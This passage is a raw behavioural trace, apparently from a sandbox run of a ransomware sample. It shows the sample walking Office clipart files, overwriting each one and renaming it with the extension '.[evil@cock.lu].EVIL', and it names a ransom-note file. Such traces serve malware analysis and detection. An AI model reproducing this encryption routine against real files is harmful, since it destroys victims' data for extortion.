hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x60e0, lpOverlapped=0x0) returned 1 [0108.868] CloseHandle (hObject=0x1a8) returned 1 [0108.868] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.869] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.869] __uncaught_exception () returned 0x84b1160800 [0108.869] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.869] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf.[evil@cock.lu].evil")) returned 1 [0108.870] ??_V@YAXPEAX@Z () returned 0x1 [0108.873] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF", dwFileAttributes=0x200) returned 0 [0108.874] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.874] wcsstr (_Str="BD08808_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.874] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 69 [0108.874] wcscmp (_String1="BD08808_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.874] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD08808_.WMF") returned 0x0 [0108.874] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 0x45 [0108.874] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.876] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbb7c, lpOverlapped=0x0) returned 1 [0108.886] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.886] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.886] _errno () returned 0x84b1160840 [0108.886] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.886] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbb80, lpOverlapped=0x0) returned 1 [0108.886] CloseHandle (hObject=0x1a8) returned 1 [0108.886] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.887] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.887] __uncaught_exception () returned 0x84b1160800 [0108.887] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.887] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf.[evil@cock.lu].evil")) returned 1 [0108.888] ??_V@YAXPEAX@Z () returned 0x1 [0108.892] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF", dwFileAttributes=0x200) returned 0 [0108.892] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.892] wcsstr (_Str="BD08868_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.892] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 69 [0108.892] wcscmp (_String1="BD08868_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.892] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD08868_.WMF") returned 0x0 [0108.892] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 0x45 [0108.892] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.894] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9d0e, lpOverlapped=0x0) returned 1 [0108.922] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.922] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.922] _errno () returned 0x84b1160840 [0108.923] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.923] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x9d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9d20, lpOverlapped=0x0) returned 1 [0108.923] CloseHandle (hObject=0x1a8) returned 1 [0108.923] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.923] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.923] __uncaught_exception () returned 0x84b1160800 [0108.923] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.924] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf.[evil@cock.lu].evil")) returned 1 [0108.925] ??_V@YAXPEAX@Z () returned 0x1 [0108.928] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF", dwFileAttributes=0x200) returned 0 [0108.928] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.928] wcsstr (_Str="BD09031_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.928] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 69 [0108.929] wcscmp (_String1="BD09031_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.929] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD09031_.WMF") returned 0x0 [0108.929] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 0x45 [0108.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.931] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbaaa, lpOverlapped=0x0) returned 1 [0108.956] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.956] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.956] _errno () returned 0x84b1160840 [0108.956] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.956] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xbac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbac0, lpOverlapped=0x0) returned 1 [0108.957] CloseHandle (hObject=0x1a8) returned 1 [0108.957] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.957] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.957] __uncaught_exception () returned 0x84b1160800 [0108.957] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.958] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf.[evil@cock.lu].evil")) returned 1 [0108.959] ??_V@YAXPEAX@Z () returned 0x1 [0108.962] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF", dwFileAttributes=0x200) returned 0 [0108.962] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.962] wcsstr (_Str="BD09194_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.962] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 69 [0108.963] wcscmp (_String1="BD09194_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.963] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD09194_.WMF") returned 0x0 [0108.963] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 0x45 [0108.963] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.965] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x38cc, lpOverlapped=0x0) returned 1 [0108.975] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.975] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.975] _errno () returned 0x84b1160840 [0108.975] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.975] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x38e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x38e0, lpOverlapped=0x0) returned 1 [0108.975] CloseHandle (hObject=0x1a8) returned 1 [0108.976] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.976] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.976] __uncaught_exception () returned 0x84b1160800 [0108.976] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.976] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf.[evil@cock.lu].evil")) returned 1 [0108.977] ??_V@YAXPEAX@Z () returned 0x1 [0108.981] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF", dwFileAttributes=0x200) returned 0 [0108.981] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.981] wcsstr (_Str="BD09662_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.981] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 69 [0108.981] wcscmp (_String1="BD09662_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.981] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD09662_.WMF") returned 0x0 [0108.981] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 0x45 [0108.981] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.984] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x504a, lpOverlapped=0x0) returned 1 [0108.993] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.993] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.994] _errno () returned 0x84b1160840 [0108.994] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.994] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5060, lpOverlapped=0x0) returned 1 [0108.994] CloseHandle (hObject=0x1a8) returned 1 [0108.994] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.994] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.995] __uncaught_exception () returned 0x84b1160800 [0108.995] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.995] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf.[evil@cock.lu].evil")) returned 1 [0108.996] ??_V@YAXPEAX@Z () returned 0x1 [0108.999] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF", dwFileAttributes=0x200) returned 0 [0108.999] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0109.000] wcsstr (_Str="BD09664_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0109.000] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 69 [0109.000] wcscmp (_String1="BD09664_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0109.000] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD09664_.WMF") returned 0x0 [0109.000] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 0x45 [0109.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0109.002] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f1e, lpOverlapped=0x0) returned 1 [0109.012] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.012] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.012] _errno () returned 0x84b1160840 [0109.012] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.012] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f20, lpOverlapped=0x0) returned 1 [0109.012] CloseHandle (hObject=0x1a8) returned 1 [0109.012] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0109.013] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0109.013] __uncaught_exception () returned 0x84b1160800 [0109.013] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0109.013] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf.[evil@cock.lu].evil")) returned 1 [0109.014] ??_V@YAXPEAX@Z () returned 0x1 [0109.018] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF", dwFileAttributes=0x200) returned 0 [0109.018] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0109.018] wcsstr (_Str="BD10890_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0109.018] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 69 [0109.018] wcscmp (_String1="BD10890_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0109.018] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD10890_.GIF") returned 0x0 [0109.018] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 0x45 [0109.018] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0109.020] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x34cb, lpOverlapped=0x0) returned 1 [0109.029] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.029] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.029] _errno () returned 0x84b1160840 [0109.030] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.030] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x34e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x34e0, lpOverlapped=0x0) returned 1 [0109.030] CloseHandle (hObject=0x1a8) returned 1 [0109.030] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0109.030] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0109.030] __uncaught_exception () returned 0x84b1160800 [0109.030] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0109.031] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif.[evil@cock.lu].evil")) returned 1 [0109.032] ??_V@YAXPEAX@Z () returned 0x1 [0109.035] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF", dwFileAttributes=0x200) returned 0 [0109.036] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0109.036] wcsstr (_Str="BD10972_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0109.036] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 69 [0109.036] wcscmp (_String1="BD10972_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0109.036] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD10972_.GIF") returned 0x0 [0109.036] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 0x45 [0109.036] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0109.039] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4edd, lpOverlapped=0x0) returned 1 [0109.048] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.048] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.048] _errno () returned 0x84b1160840 [0109.049] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.049] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ee0, lpOverlapped=0x0) returned 1 [0109.049] CloseHandle (hObject=0x1a8) returned 1 [0109.049] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft 